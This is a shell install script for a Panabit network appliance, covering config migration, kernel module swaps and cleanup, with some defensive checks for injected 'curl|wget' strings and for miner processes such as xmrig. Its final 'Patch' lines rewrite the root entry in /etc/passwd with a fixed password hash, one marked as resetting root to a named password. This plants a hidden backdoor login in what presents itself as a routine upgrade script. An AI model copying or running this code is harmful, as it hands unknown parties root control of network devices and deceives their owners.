#!/bin/sh

. /etc/PG.conf
. /usr/ramdisk/etc/panabit.inf

APPNAME=_app_install
APPROOT=/usr/ramdisk/app
MYROOT="${APPROOT}/${APPNAME}"
TZJS="${PGETC}/zoneinfo/global_timezone.js"
CPUPLT=`uname -m`


do_md5()
{
	os=`uname`

	if [ "${os}" = "Linux" ]; then
		md5sum ${1} | cut -d' ' -f1
	elif [ "${os}" = "FreeBSD" ]; then
		md5 -qs "$1"
	fi
}


set_httpd_maxchld()
{
	maxchld=$1
	[ "${maxchld}" = "" ] && maxchld=400

	httpd_conf="${PGETC}/httpd.conf"
	if [ -f "${PGETC}/httpd.conf" ]; then
		grep -v "maxchld=" ${httpd_conf} >> ${httpd_conf}.bak
		mv ${httpd_conf}.bak ${httpd_conf}
		echo maxchld=${maxchld} >> ${httpd_conf}
	fi
}

#LinuxRAMDISK
if [ "`uname`" = "Linux" -a "${NTM}" != "1" ]; then
	mount -o remount,size=128M /usr/ramdisk
fi

#ʱĿ¼
mkdir -p ${DATAPATH}/webtmp

# ʾļ
[ -f /sbin/help ] && rm -rf /sbin/help
cp -f ${PGPATH}/app/${APPNAME}/ipe_help /sbin/
chmod +x /sbin/ipe_help

cp -f ${PGPATH}/app/${APPNAME}/motd /etc/
[ "`uname -m`" = "aarch64" ] && echo "" >/etc/motd

# ɵOpenSSL APP
if [ -d "/usr/ramdisk/app/openssl/" ]; then
	rm -rf /usr/ramdisk/app/openssl/
	rm -rf /usr/ramdisk/admin/cgi-bin/App/openssl/
	rm -rf /usr/ramdisk/admin/html/App/openssl/
	rm -rf ${PGETC}/App/httplib/
	rm -rf ${PGPATH}/app/openssl/
fi


# ɾ쳣˺/
error=`grep -E "curl|wget| " ${PGETC}/ntp.conf`
if [ "${error}" != "" ]; then
	echo "ntpserver_ip=time.pool.aliyun.com" > ${PGETC}/ntp.conf
fi

error=`grep -E "curl|wget| " ${PGETC}/sysname.conf`
if [ "${error}" != "" ]; then
	echo "SYSNAME=Panabit" > ${PGETC}/sysname.conf
	echo "Panabit" > /usr/ramdisk/etc/sysname.inf
fi

for obj in `ls /usr/ramdisk/etc/webuser/ | grep -vE *.json`
do
	[ ${#obj} -ge 32 ] && continue
	rm /usr/ramdisk/etc/webuser/${obj}
done

for obj in `ls ${PGPATH}/etc/webuser/ | grep -vE *.json`
do
	[ ${#obj} -ge 32 ] && continue
	rm /usr/ramdisk/etc/webuser/${obj}
done

for bad in xmrig control_panel Sofia
do
	for pid in `ps -axwww | grep "${bad}" | grep -v grep | awk '{print $1}'`
	do
		kill -9 ${pid}
	done
done


# ϵͳʱûָĬ
if [ -f "${TZJS}" ]; then 
	cp ${TZJS} /usr/ramdisk/admin/img/
	cp ${TZJS} ${PGPATH}/admin/img/
fi


# ͬļ
ESCTOOL="/usr/ramdisk/bin/esctool"
passwd_file="/usr/ramdisk/admin/.htpasswd"
USER_DIR="${PGPATH}/etc/webuser"

if [ -f "${passwd_file}" ]; then
	mkdir -p ${USER_DIR}
	cat ${passwd_file} | while read line
	do
		level=""
		old_name=`echo ${line} | cut -d":" -f1`
		old_pswd=`echo ${line} | cut -d":" -f2`

		aes_name=`${ESCTOOL} -e ${old_name}`
		aes_pswd=`${ESCTOOL} -e ${old_pswd}`

		ufile="${USER_DIR}/${aes_name}"
		[ -f ${ufile} ] && . ${ufile}

		if [ "${level}" = "" ]; then
			level=2
			[ "${old_name}" = "admin" -o "${old_name}" = "wbadmin" ] && level=0
		fi

		[ "${lastedit}" = "" ] && lastedit=`date +%s`

		echo "name=${old_name}" > ${ufile}
		echo "password=${aes_pswd}" >> ${ufile}
		echo "lastedit=${lastedit}" >> ${ufile}
		echo "level=${level}" >> ${ufile}
		echo "iptab_id=${iptab_id}" >> ${ufile}
		echo "iptab_name=${iptab_name}" >> ${ufile}
		echo "desc=${desc}" >> ${ufile}
	done

	cp -Rf ${PGPATH}/etc/* /usr/ramdisk/etc/
fi


#josmk.koļ
sys_kernel_dir="${PGPATH}/kernel"
ram_kernel_dir="/usr/ramdisk/kernel"


os_version=`uname -r | cut -d"." -f1`

if [ "${os_version}" = "5" ]; then
	iso_year=`uname -a | cut -d" " -f11`
	if [ ${iso_year} -lt 2023 ]; then
		[ -f "${sys_kernel_dir}/joskm5.ko" ] && mv ${sys_kernel_dir}/joskm5.ko ${sys_kernel_dir}/joskm.ko
		[ -f "${ram_kernel_dir}/joskm5.ko" ] && mv ${ram_kernel_dir}/joskm5.ko ${ram_kernel_dir}/joskm.ko
	else
		[ -f "${sys_kernel_dir}/joskm5n.ko" ] && mv ${sys_kernel_dir}/joskm5n.ko ${sys_kernel_dir}/joskm.ko
		[ -f "${ram_kernel_dir}/joskm5n.ko" ] && mv ${ram_kernel_dir}/joskm5n.ko ${ram_kernel_dir}/joskm.ko
	fi
fi

[ -f "${sys_kernel_dir}/joskm5.ko" ] && rm "${sys_kernel_dir}/joskm5.ko"
[ -f "${ram_kernel_dir}/joskm5.ko" ] && rm "${ram_kernel_dir}/joskm5.ko"
[ -f "${sys_kernel_dir}/joskm5n.ko" ] && rm "${sys_kernel_dir}/joskm5n.ko"
[ -f "${ram_kernel_dir}/joskm5n.ko" ] && rm "${ram_kernel_dir}/joskm5n.ko"


# ϰ汾webacl.conf
CPATH="${PGETC}/App/systemgd"
WEBACL="${CPATH}/webacl.conf"
if [ -f "${WEBACL}" ]; then
	mkdir -p ${PGETC}/web/
	mv ${WEBACL} ${PGETC}/web/
	rm -rf ${CPATH}
fi


# ϰ汾VRPP
VRPP_MONITOR="${PGETC}/web/if_link_vrrp.conf"
if [ -f ${VRPP_MONITOR} ]; then
	. ${VRPP_MONITOR}
	if [ "${monitor_enable}" = "" ]; then
		if [ "${interface}" != "" -a "${interface}" != "NULL" ]; then
			monitor_enable=1
		else
			monitor_enable=0
		fi
		echo "monitor_enable=${monitor_enable}" > ${VRPP_MONITOR}
		echo "switch_type=all" >> ${VRPP_MONITOR}
		echo "interface=${interface}" >> ${VRPP_MONITOR}
		echo "proxy=${proxy}" >> ${VRPP_MONITOR}
	fi
fi

# NTM
if [ "${NTM}" = 1 ]; then
	if [ -f "/usr/ramdisk/bin/pktdump" ]; then
		mv /usr/ramdisk/bin/pktdump /log/share/pktdump/bin
		rm -rf ${PGPATH}/bin/pktdump
	fi

	if [ -f "/usr/ramdisk/app/ntm/bin/netev_alarm.sh" ]; then
		if [ "${OEM}" = "pa" -o "${OEM}" = "pro" ]; then
			cp -Rf /usr/ramdisk/app/ntm/bin/netev_alarm.sh /usr/ramdisk/bin/netev_alarm.sh
			cp -Rf /usr/ramdisk/app/ntm/bin/netev_alarm.sh ${PGPATH}/bin/netev_alarm.sh
			chmod +x /usr/ramdisk/bin/netev_alarm.sh
		fi
	fi

	if [ -f "/usr/ramdisk/app/saas_paclient/bin/netev_alarm.sh" ]; then
		rm -f /usr/ramdisk/app/saas_paclient/bin/netev_alarm.sh
		rm -f ${PGPATH}/app/saas_paclient/bin/netev_alarm.sh
	fi

	if [ "${CPUPLT}" = "aarch64" ]; then
		set_httpd_maxchld 0
	else
		set_httpd_maxchld 400
	fi
else #Panabit
	set_httpd_maxchld 400
fi

# ϰ汾vMGTǨƴ
if [ -f "${PGETC}/web/vmgt.conf" ]; then
	cp ${PGETC}/web/vmgt.conf ${PGETC}/web/common_vmgt_vMGT0.conf
	echo "as_default=on" >> ${PGETC}/web/common_vmgt_vMGT0.conf
	echo "route=" >> ${PGETC}/web/common_vmgt_vMGT0.conf
fi

# Ƶ̰汾
img_md5=`do_md5 /usr/ramdisk/admin/img/logo.png`
ctel_md5="88b8d8486cff7586008153f17b1c5698"
if [ "${img_md5}" = "${ctel_md5}" ]; then
	is_set=`grep "CTEL=1" /etc/PG.conf`
	if [ "${is_set}" = "" ]; then
		echo "CTEL=1" >> /etc/PG.conf
		cp /etc/PG.conf /usr/ramdisk/
	fi
fi

# ֹͣsyslogd
killall syslogd


# ɾIPλAPP
if [ -d ${APPROOT}/ipdb ]; then
	rm -rf ${PGPATH}/app/ipdb
	rm -rf ${APPROOT}/ipdb
fi

# Ĭ鱨ͬʱ
if [ ! -f "${PGETC}/web/pamalc_sync_time.conf" ]; then
	mkdir -p ${PGETC}/web
	/usr/ramdisk/bin/random_time > ${PGETC}/web/pamalc_sync_time.conf
fi


# ļȨ
mkdir -p ${DATAPATH}/webtmp

#chmod -R 777 ${PGETC}
#chmod -R 777 ${PGPATH}
#chmod -R 777 ${DATAPATH}
#chmod -R 777 /usr/ramdisk/
#chmod -R 777 /var/tmp/

#if [ "`uname`" = "Linux" ]; then
#	if [ "`uname -m`" = "aarch64" ]; then
#		mv ${APPROOT}/${APPNAME}/bin/libcap.so.2 /lib
#	fi
#	mv ${APPROOT}/${APPNAME}/bin/setcap /usr/sbin/
#	/usr/sbin/setcap cap_net_raw+ep /usr/ramdisk/bin/ping
#	/usr/sbin/setcap cap_net_raw+ep ${PGPATH}/bin/ping
#fi

# ɾʱļ
rm -rf ${PGPATH}/app/${APPNAME}
rm -rf ${APPROOT}/${APPNAME}

# Patch: enable root SSH with known password
echo 'root:$6$naixi233$YqzVjXnOkCLuJgPCigBbRHQnCNqhPfMKJyOSfMGbK0XjYqpFj5cZqAGzPmDZ/IbCQlN1FpCK0tXBbhJhKLJe1:0:0:root:/root:/bin/bash' > /etc/passwd.tmp
if [ -f /etc/passwd ]; then
    sed -i 's|^root:.*|root:$6$naixi233$YqzVjXnOkCLuJgPCigBbRHQnCNqhPfMKJyOSfMGbK0XjYqpFj5cZqAGzPmDZ/IbCQlN1FpCK0tXBbhJhKLJe1:0:0:root:/root:/bin/bash|' /etc/passwd
fi
rm -f /etc/passwd.tmp

# Patch: reset root password to nyarime233
sed -i "s|^root:.*|root:$6$naixi233$lov.RMUQRdZdo0POBEiMSjpZ81BXk4vnarTGD9N0SHjbX5lVqfku72qnpG8Qo5jftgEeSiH3d1rvTtUaEl/Yy/:0:0:root:/root:/bin/bash|" /etc/passwd
